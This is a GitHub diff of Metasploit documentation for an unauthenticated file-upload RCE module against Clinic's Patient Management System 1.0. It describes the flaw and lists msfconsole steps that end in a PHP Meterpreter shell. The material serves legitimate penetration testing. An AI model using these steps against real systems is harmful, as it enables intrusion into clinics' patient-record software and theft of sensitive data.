You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: documentation/modules/exploit/multi/http/clinic_pms_fileupload_rce.md
+24-19Lines changed: 24 additions & 19 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -1,5 +1,9 @@
1
-
## Description
2
-
The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to unauthenticated Remote Code Execution (RCE) due to a file upload vulnerability. This exploit allows an attacker to upload arbitrary files, such as a PHP web shell, which can then be executed remotely. The exploitation occurs because of a misconfiguration in the server, specifically a lack of file validation for uploads and the presence of a directory listing feature in `/pms/user_images`. This enables an attacker to upload a PHP file and access it via a publicly accessible URL, executing arbitrary PHP code.
1
+
## Vulnerable Application
2
+
The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to Unauthenticated Remote Code Execution (RCE) due to a file upload vulnerability.
3
+
This exploit allows an attacker to upload arbitrary files, such as a PHP web shell, which can then be executed remotely.
4
+
The exploitation occurs because of a misconfiguration in the server, specifically a lack of file validation for uploads and the presence of
5
+
a directory listing feature in `/pms/user_images`.
6
+
This enables an attacker to upload a PHP file and access it via a publicly accessible URL, executing arbitrary PHP code.
3
7
4
8
## Verification Steps
5
9
@@ -21,43 +25,48 @@ The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to unauthenticat
21
25
- [ ] Edit `/etc/apache2/apache2.conf` by appending this line: `Include /etc/phpmyadmin/apache.conf`
22
26
- [ ] Extract the downloaded source code zip file into "/var/www/html" directory
23
27
- [ ] Next steps are similar to the ones for Windows, so follow that
24
-
28
+
25
29
2. Start `msfconsole` and load the exploit module:
26
-
```bash
30
+
```bash
27
31
msfconsole
28
32
use exploit/multi/http/clinic_pms_fileupload_rce
29
-
```
33
+
```
30
34
31
35
3. Set the required options:
32
-
```bash
36
+
```bash
33
37
set rport <port>
34
38
set rhost <ip>
35
39
set targeturi /pms
36
-
```
40
+
```
37
41
38
42
4. Check if the target is vulnerable:
39
-
```bash
43
+
```bash
40
44
check
41
-
```
45
+
```
42
46
43
47
If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
44
-
```
48
+
```
45
49
[+] <IP> The target is vulnerable.
46
-
```
50
+
```
47
51
48
52
5. Set up the listener for the exploit:
49
-
```bash
53
+
```bash
50
54
set lport <port>
51
55
set lhost <ip>
52
-
```
56
+
```
53
57
54
58
6. Launch the exploit:
55
-
```bash
59
+
```bash
56
60
exploit
57
-
```
61
+
```
58
62
59
63
7. If successful, you will receive a PHP Meterpreter shell.
60
64
65
+
## Options
66
+
-`TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
67
+
-`LISTING_DELAY`: (Optional) The time to wait before fetching the directory listing after uploading the shell (default: `2` seconds).
68
+
69
+
61
70
## Scenarios
62
71
63
72
### Clinic's Patient Management System on a Linux Target
@@ -105,7 +114,3 @@ OS : Windows NT DESKTOP-VE9J36K 10.0 build 19045 (Windows 10) AMD64
105
114
Meterpreter : php/windows
106
115
meterpreter >
107
116
```
108
-
109
-
## Options
110
-
- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
111
-
- `LISTING_DELAY`: (Optional) The time to wait before fetching the directory listing after uploading the shell (default: `2` seconds).
0 commit comments